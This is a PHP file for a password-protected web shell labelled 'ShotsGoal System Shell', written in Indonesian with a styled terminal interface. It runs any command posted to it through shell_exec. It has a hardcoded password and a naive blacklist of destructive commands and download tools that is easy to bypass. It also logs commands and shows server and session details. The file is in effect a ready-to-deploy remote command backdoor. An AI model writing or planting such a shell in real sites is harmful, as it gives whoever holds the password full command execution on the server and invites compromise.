<?php
/**
 * SHELL ASLI - ShotsGoal Real System Terminal
 * VERSI PERBAIKAN - Tampilan Sempurna
 * 
 * Peringatan: Hanya gunakan di lingkungan aman!
 */

// Aktifkan error reporting untuk debugging (nonaktifkan di production)
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Pastikan session dimulai
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// ============================================
// KONFIGURASI (UBAH SESUAI KEBUTUHAN)
// ============================================
define('SHELL_PASSWORD', 'shotsgoal123'); // GANTI!
define('LOG_FILE', __DIR__ . '/shell_log.txt');
define('MAX_LOG_SIZE', 500);
$background_url = 'https://i.postimg.cc/V6z8SWM6/d0346d659ccbce0e8edf71cd1e623912.jpg';

// ============================================
// FUNGSI LOG
// ============================================
function writeLog($command, $output) {
    $log = @fopen(LOG_FILE, 'a');
    if ($log) {
        $date = date('Y-m-d H:i:s');
        $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown';
        $user = $_SESSION['username'] ?? 'unknown';
        fwrite($log, "[$date] IP: $ip | USER: $user | CMD: $command\n");
        fwrite($log, "OUTPUT:\n$output\n");
        fwrite($log, str_repeat('-', 80) . "\n");
        fclose($log);
    }
    
    // Batasi ukuran log
    if (file_exists(LOG_FILE)) {
        $lines = file(LOG_FILE);
        if (count($lines) > MAX_LOG_SIZE) {
            $lines = array_slice($lines, -MAX_LOG_SIZE);
            file_put_contents(LOG_FILE, implode('', $lines));
        }
    }
}

// ============================================
// PROSES LOGIN
// ============================================
$error = '';
if (isset($_POST['login'])) {
    $password = $_POST['password'] ?? '';
    if ($password === SHELL_PASSWORD) {
        $_SESSION['shell_logged_in'] = true;
        $_SESSION['login_time'] = time();
        $_SESSION['username'] = 'admin';
        // Refresh halaman untuk menghilangkan POST data
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } else {
        $error = 'Password salah!';
    }
}

if (isset($_GET['logout'])) {
    unset($_SESSION['shell_logged_in']);
    session_destroy();
    header('Location: ' . $_SERVER['PHP_SELF']);
    exit;
}

$isLoggedIn = isset($_SESSION['shell_logged_in']) && $_SESSION['shell_logged_in'] === true;

// ============================================
// PROSES PERINTAH
// ============================================
$command = '';
$output = '';

if ($isLoggedIn && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['command'])) {
    $command = trim($_POST['command']);
    
    // Blacklist perintah berbahaya
    $dangerous = ['rm -rf', 'mkfs', 'dd', '> /dev/sd', ':(){', 'wget', 'curl', 'chmod 777', 'mv', 'cp', 'kill'];
    $safe = true;
    foreach ($dangerous as $bad) {
        if (stripos($command, $bad) !== false) {
            $safe = false;
            break;
        }
    }
    
    if (!$safe) {
        $output = "PERINTAH DITOLAK: Operasi berbahaya tidak diizinkan.\n";
    } elseif ($command === 'clear') {
        // Clear screen - simpan sesi untuk membersihkan output
        $_SESSION['clear_screen'] = true;
        header('Location: ' . $_SERVER['PHP_SELF']);
        exit;
    } elseif ($command === 'log') {
        if (file_exists(LOG_FILE)) {
            $output = file_get_contents(LOG_FILE);
        } else {
            $output = "Belum ada log.";
        }
    } else {
        // Eksekusi perintah dengan pengamanan
        $output = shell_exec($command . ' 2>&1');
        if ($output === null || $output === '') {
            $output = "Perintah selesai (tanpa output).\n";
        }
        writeLog($command, $output);
    }
}

// Jika ada permintaan clear screen, kita hanya tidak menampilkan output sebelumnya
if (isset($_SESSION['clear_screen'])) {
    unset($_SESSION['clear_screen']);
    // Tidak perlu menampilkan output lama
}

// ============================================
// MULAI OUTPUT HTML
// ============================================
?><!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ShotsGoal • System Shell</title>
    <!-- Font Awesome -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <!-- Google Fonts -->
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;600;700&display=swap" rel="stylesheet">
    <style>
        /* ===== RESET & BASE ===== */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        html, body {
            min-height: 100vh;
            width: 100%;
        }
        body {
            background: url('<?php echo $background_url; ?>') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Inter', sans-serif;
            display: flex;
            align-items: center;
            justify-content: center;
            padding: 20px;
            position: relative;
        }
        body::before {
            content: '';
            position: fixed;
            top: 0; left: 0; width: 100%; height: 100%;
            background: rgba(0, 0, 0, 0.7);
            backdrop-filter: blur(8px);
            z-index: 0;
        }
        
        /* ===== CONTAINER UTAMA ===== */
        .shell-container {
            position: relative;
            z-index: 1;
            width: 100%;
            max-width: 1200px;
            background: rgba(10, 20, 30, 0.85);
            backdrop-filter: blur(15px);
            border: 1px solid rgba(255,255,255,0.1);
            border-radius: 28px;
            box-shadow: 0 30px 60px -15px black;
            overflow: hidden;
        }
        
        /* ===== HEADER ===== */
        .shell-header {
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 16px 24px;
            background: rgba(0,0,0,0.4);
            border-bottom: 1px solid rgba(255,255,255,0.1);
        }
        .shell-title {
            display: flex;
            align-items: center;
            gap: 12px;
            color: white;
            font-weight: 600;
            font-size: 16px;
        }
        .shell-title i { color: #1A73E8; }
        .window-controls { display: flex; gap: 12px; }
        .window-btn {
            width: 16px; height: 16px; border-radius: 50%;
            cursor: pointer;
            transition: 0.2s;
        }
        .window-btn.red { background: #E84142; }
        .window-btn.yellow { background: #FFC107; }
        .window-btn.green { background: #28A745; }
        .window-btn:hover { filter: brightness(1.2); transform: scale(1.1); }
        
        /* ===== LOGIN FORM ===== */
        .login-box {
            padding: 60px 40px;
            text-align: center;
            color: white;
        }
        .login-box h2 { font-size: 28px; margin-bottom: 10px; }
        .login-box p { color: #8A9BB0; margin-bottom: 30px; }
        .login-input {
            width: 100%;
            max-width: 300px;
            padding: 15px 20px;
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.2);
            border-radius: 40px;
            color: white;
            font-size: 16px;
            margin-bottom: 20px;
            outline: none;
            transition: all 0.3s;
        }
        .login-input:focus { 
            border-color: #1A73E8; 
            background: rgba(26,115,232,0.1);
            box-shadow: 0 0 0 3px rgba(26,115,232,0.2);
        }
        .login-btn {
            background: #1A73E8;
            color: white;
            border: none;
            padding: 14px 40px;
            border-radius: 40px;
            font-weight: 700;
            font-size: 16px;
            cursor: pointer;
            transition: 0.2s;
            display: inline-flex;
            align-items: center;
            gap: 8px;
        }
        .login-btn:hover { background: #0D5BBF; transform: translateY(-2px); }
        .error { color: #E84142; margin-top: 15px; }
        
        /* ===== TERMINAL AREA ===== */
        .terminal-area {
            display: <?php echo $isLoggedIn ? 'flex' : 'none'; ?>;
            flex-direction: column;
            height: 600px;
        }
        .terminal-body {
            flex: 1;
            overflow-y: auto;
            padding: 20px;
            background: rgba(0,0,0,0.3);
            font-family: 'JetBrains Mono', monospace;
            font-size: 14px;
            color: #E0EAF5;
            line-height: 1.6;
            scroll-behavior: smooth;
        }
        .terminal-body::-webkit-scrollbar {
            width: 8px;
        }
        .terminal-body::-webkit-scrollbar-track {
            background: rgba(255,255,255,0.05);
        }
        .terminal-body::-webkit-scrollbar-thumb {
            background: rgba(255,255,255,0.2);
            border-radius: 10px;
        }
        .log-line {
            margin-bottom: 6px;
            word-break: break-word;
            border-bottom: 1px solid rgba(255,255,255,0.03);
            padding-bottom: 4px;
        }
        .prompt-line {
            color: #28A745;
            font-weight: 600;
        }
        .command-output {
            white-space: pre-wrap;
            color: #B0C2D4;
            margin-left: 20px;
            padding: 10px;
            background: rgba(0,0,0,0.2);
            border-radius: 8px;
            margin-bottom: 10px;
            border-left: 3px solid #1A73E8;
        }
        .input-area {
            display: flex;
            align-items: center;
            padding: 16px 20px;
            background: rgba(0,0,0,0.5);
            border-top: 1px solid rgba(255,255,255,0.1);
        }
        .prompt-symbol {
            color: #1A73E8;
            font-size: 20px;
            margin-right: 12px;
        }
        .command-form {
            flex: 1;
            display: flex;
            gap: 12px;
        }
        .command-input {
            flex: 1;
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.2);
            border-radius: 40px;
            padding: 14px 20px;
            color: white;
            font-family: 'JetBrains Mono', monospace;
            font-size: 15px;
            outline: none;
            transition: all 0.3s;
        }
        .command-input:focus {
            border-color: #1A73E8;
            box-shadow: 0 0 0 3px rgba(26,115,232,0.2);
            background: rgba(26,115,232,0.1);
        }
        .btn-send {
            background: #1A73E8;
            border: none;
            border-radius: 40px;
            padding: 0 30px;
            color: white;
            font-weight: 700;
            cursor: pointer;
            transition: 0.2s;
            display: flex;
            align-items: center;
            gap: 8px;
        }
        .btn-send:hover {
            background: #0D5BBF;
            transform: translateY(-2px);
        }
        .action-buttons {
            display: flex;
            gap: 10px;
            margin-left: 15px;
        }
        .action-btn {
            width: 46px;
            height: 46px;
            border-radius: 50%;
            background: rgba(255,255,255,0.05);
            border: 1px solid rgba(255,255,255,0.1);
            color: #B0C2D4;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
            transition: 0.2s;
            text-decoration: none;
        }
        .action-btn:hover {
            background: #1A73E8;
            color: white;
            border-color: #1A73E8;
            transform: translateY(-2px);
        }
        .logout-btn {
            background: #E84142;
            color: white;
            padding: 10px 22px;
            border-radius: 30px;
            text-decoration: none;
            font-weight: 600;
            font-size: 14px;
            display: flex;
            align-items: center;
            gap: 8px;
            margin-left: 15px;
            transition: 0.2s;
            border: none;
        }
        .logout-btn:hover {
            background: #C62828;
            transform: translateY(-2px);
        }
        .info-bar {
            padding: 10px 24px;
            background: rgba(26,115,232,0.1);
            color: #8A9BB0;
            font-size: 12px;
            border-top: 1px solid rgba(255,255,255,0.05);
            display: flex;
            gap: 20px;
            flex-wrap: wrap;
        }
        
        /* Responsive */
        @media (max-width: 768px) {
            .shell-container {
                border-radius: 20px;
            }
            .input-area {
                flex-wrap: wrap;
                gap: 10px;
            }
            .command-form {
                width: 100%;
            }
            .action-buttons {
                margin-left: 0;
                width: 100%;
                justify-content: center;
            }
            .logout-btn {
                margin-left: 0;
                width: 100%;
                justify-content: center;
            }
            .info-bar {
                flex-direction: column;
                gap: 5px;
            }
        }
    </style>
</head>
<body>
    <div class="shell-container">
        <div class="shell-header">
            <div class="shell-title">
                <i class="fas fa-terminal"></i>
                <span>ShotsGoal System Shell <?php echo $isLoggedIn ? '• ACTIVE' : '• LOCKED'; ?></span>
            </div>
            <div class="window-controls">
                <div class="window-btn red" onclick="alert('Window controls visual only')"></div>
                <div class="window-btn yellow" onclick="alert('Window controls visual only')"></div>
                <div class="window-btn green" onclick="window.location.href='?'"></div>
            </div>
        </div>

        <?php if (!$isLoggedIn): ?>
        <!-- LOGIN FORM -->
        <div class="login-box">
            <i class="fas fa-lock" style="font-size: 60px; color: #1A73E8; margin-bottom: 20px;"></i>
            <h2>Akses Terbatas</h2>
            <p>Masukkan password untuk mengakses system shell</p>
            <?php if (!empty($error)): ?>
                <div class="error"><i class="fas fa-exclamation-circle"></i> <?php echo htmlspecialchars($error); ?></div>
            <?php endif; ?>
            <form method="POST">
                <input type="password" name="password" class="login-input" placeholder="Password" autofocus required>
                <button type="submit" name="login" class="login-btn"><i class="fas fa-sign-in-alt"></i> Masuk</button>
            </form>
            <div style="margin-top: 30px; font-size: 12px; color: #5F748C;">
                <i class="fas fa-info-circle"></i> Semua aktivitas akan tercatat.
            </div>
        </div>
        <?php else: ?>
        <!-- TERMINAL AREA -->
        <div class="terminal-area">
            <div class="terminal-body" id="terminalBody">
                <?php
                // Tampilkan output jika ada
                if (!empty($command)) {
                    echo '<div class="log-line"><span class="prompt-line">❯ ' . htmlspecialchars($command) . '</span></div>';
                }
                if (!empty($output)) {
                    echo '<div class="command-output">' . nl2br(htmlspecialchars($output)) . '</div>';
                }
                ?>
                <div id="scrollAnchor"></div>
            </div>

            <div class="input-area">
                <div class="prompt-symbol">❯</div>
                <form method="POST" class="command-form" id="commandForm">
                    <input type="text" name="command" class="command-input" placeholder="Ketik perintah (ls, whoami, pwd, date, php -v, dll)" autocomplete="off" autofocus required>
                    <button type="submit" class="btn-send"><i class="fas fa-paper-plane"></i> <span>Kirim</span></button>
                </form>
                <div class="action-buttons">
                    <a href="?clear=1" class="action-btn" title="Clear screen (gunakan perintah 'clear')">
                        <i class="fas fa-eraser"></i>
                    </a>
                    <a href="#" class="action-btn" onclick="document.querySelector('.command-input').value='help'; return false;" title="Bantuan (help)">
                        <i class="fas fa-question"></i>
                    </a>
                    <a href="?logout=1" class="action-btn" title="Logout">
                        <i class="fas fa-sign-out-alt"></i>
                    </a>
                </div>
                <a href="?logout=1" class="logout-btn"><i class="fas fa-power-off"></i> Logout</a>
            </div>
            
            <div class="info-bar">
                <span><i class="fas fa-fingerprint"></i> Session: <?php echo htmlspecialchars(session_id()); ?></span>
                <span><i class="fas fa-clock"></i> Login: <?php echo date('H:i:s', $_SESSION['login_time']); ?></span>
                <span><i class="fas fa-database"></i> Log: <?php echo file_exists(LOG_FILE) ? round(filesize(LOG_FILE)/1024, 2) . ' KB' : '0 KB'; ?></span>
                <span><i class="fas fa-globe"></i> Server: <?php echo php_uname('s'); ?></span>
            </div>
        </div>
        <?php endif; ?>
    </div>

    <script>
        (function() {
            // Auto scroll ke bawah
            const terminalBody = document.getElementById('terminalBody');
            if (terminalBody) {
                terminalBody.scrollTop = terminalBody.scrollHeight;
            }

            // Fokus input
            const input = document.querySelector('.command-input');
            if (input) input.focus();

            // Shortcut Ctrl+L untuk clear
            document.addEventListener('keydown', function(e) {
                if (e.ctrlKey && e.key === 'l') {
                    e.preventDefault();
                    window.location.href = '?clear=1';
                }
            });

            // Command history
            let commandHistory = [];
            let historyIndex = -1;
            
            if (input) {
                // Load history dari localStorage
                try {
                    const saved = localStorage.getItem('shell_history');
                    if (saved) commandHistory = JSON.parse(saved);
                } catch(e) {}

                input.addEventListener('keydown', function(e) {
                    if (e.key === 'ArrowUp') {
                        e.preventDefault();
                        if (commandHistory.length > 0) {
                            if (historyIndex === -1) historyIndex = commandHistory.length - 1;
                            else if (historyIndex > 0) historyIndex--;
                            input.value = commandHistory[historyIndex];
                        }
                    } else if (e.key === 'ArrowDown') {
                        e.preventDefault();
                        if (commandHistory.length > 0 && historyIndex < commandHistory.length - 1) {
                            historyIndex++;
                            input.value = commandHistory[historyIndex];
                        } else {
                            historyIndex = -1;
                            input.value = '';
                        }
                    }
                });

                document.getElementById('commandForm').addEventListener('submit', function() {
                    const cmd = input.value.trim();
                    if (cmd !== '' && !cmd.startsWith(' ')) {
                        commandHistory.push(cmd);
                        if (commandHistory.length > 50) commandHistory.shift();
                        try {
                            localStorage.setItem('shell_history', JSON.stringify(commandHistory));
                        } catch(e) {}
                        historyIndex = -1;
                    }
                });
            }
        })();
    </script>
</body>
</html>